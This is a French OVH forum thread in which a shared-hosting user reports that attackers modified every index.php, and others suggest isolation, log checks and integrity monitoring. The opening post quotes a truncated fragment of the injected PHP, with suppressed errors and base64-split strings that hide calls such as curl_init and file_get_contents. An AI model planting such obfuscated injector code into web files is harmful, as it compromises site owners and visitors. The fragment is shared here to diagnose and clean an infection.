OVH Community, votre nouvel espace communautaire.

Le ver est dans le fruit : attaques mutualisé, index;php modifiés


Nowwhat
08/05/2015, 16h01
Citation Envoyé par abds69
Déjà si le fichier a été modifé, c'est qu' un login / mot de passé ftp a été volé, il faudrait reinitialisé tous les mdp FTP.
Pas si vite.
QUI te dit qu'il faut un mot de passe pour modifier un fichier sur un hébergement ?
Les plupart des hacks sont effectués SANS accès FTP.

Il existe un test extrêmement simple et efficace pour savoir si l'accès FTP a été utilisé. Il suffit de consulter le log "access FTP" (il suffit de "lire"). Si un tiers a accédé à mon hébergement, c'est loggé.

edit: il est Vendredi donc des conseils supplémentaires peuvent être données :VIDE totalement le répertoire /www/ puis constate que le hackeur ne peut plus rien faire ..... Il suffit de réfléchir très peu pour se rendre compte comment le hackeur accède a tes fichiers sur ton hébergement

Vincent G.
07/05/2015, 16h44
Bonjour,

Comme l'a indiqué Daniel60, la meilleure solution est d'avoir différents hébergements.

Déjà si le fichier a été modifé, c'est qu' un login / mot de passé ftp a été volé, il faudrait reinitialisé tous les mdp FTP.
N'importe quel script peut avoir créé ou modifié un fichier (ce qui permet notamment d'installer des plugins sur vos CMS préférés, d'uploader des images, etc.)

Bon week-end,

abds69
06/05/2015, 14h20
Déjà si le fichier a été modifé, c'est qu' un login / mot de passé ftp a été volé, il faudrait reinitialisé tous les mdp FTP.
Après chez OVH , a partir du web PRO, tu as l'option multi-ftp où tu donnes accès à un login FTP uniquement au répertoire voulu. Après tu peux vérouiller en lecture seule les fichiers index.php, après avec un script CRON en php tu peux verifier chaque heure la date des fichiers index.php avec envoi d'email d'alerte, chaque heure tu peux forcer la copie d'un nouvel index.php.....

Un outil de surveillance existe pour windows, mais quand c'est lui qui fait tourner le service FTP.

Daniel60
04/05/2015, 08h42
Tu peux déjà vérifier l'horodatage des fichiers et leur nombre. En Linux, il y a de nombreux outils pour le faire.

FredericM
03/05/2015, 22h49
Sympa l'astuce
Et sinon, il y a des outils permettant de surveiller les modifs sauvages de fichiers php ou requêtes suspectes à partir de l'analyse des logs ?

Fred

Gaston_Phone
03/05/2015, 19h53
Astucieux.

Daniel60
03/05/2015, 17h35
Le meilleur moyen est de faire un hébergement mutualisé par domaine.
Astuce : renomme tes fichiers index.php (mondoigt.php )et indique le fichier de démarrage en .htacces

FredericM
03/05/2015, 16h48
Bonjour,

Mon mutualisé OVH accueille différents sites, gérés par différents auteurs qui ont des accès FTP propres à leur dossier de travail.
Le pb c'est que la maison (le mutualisé) accueille des locataires qui ne tiennent pas toujours les fenêtres et portes fermées (sites à jour) et tous les sites profitent de la visite des hackers...
Y a-t-il moyen de protéger les sites les uns des autres, histoire que le ver ne contamine pas tout le fruit... ?
Actuellement, tous les index.php sont modifiés par des lignes de ce type et du coup le travail de nettoyage est énorme, sans aucune garantie que cela ne dure...

Merci de votre aide
Fred

Code PHP ajouté à tous les index.php
Code PHP:
//###==###
error_reporting(0); ini_set("display_errors""0"); if (!isset($i8824abdf)) { $i8824abdf TRUE;  $GLOBALS['_537135123_']=Array(base64_decode('cH' .'Jl' .'Z1' .'9tYXRjaA' .'=='),base64_decode('ZmlsZV9nZXRf' .'Y29udGVudHM='),base64_decode('c' .'29ja2V0X2NyZWF0Z' .'V9wYWly'),base64_decode('' .'bX' .'Nz' .'c' .'W' .'xfc' .'X' .'V' .'lcnk' .'='),base64_decode('ZnVuY3' .'Rpb2' .'5fZX' .'hpc3Rz'),base64_decode('' .'Y3' .'VybF' .'9pbm' .'l0'),base64_decode('dX' .'Js' .'ZW5jb2Rl'),base64_decode('dXJsZW' .'5jb2' .'Rl'),base64_decode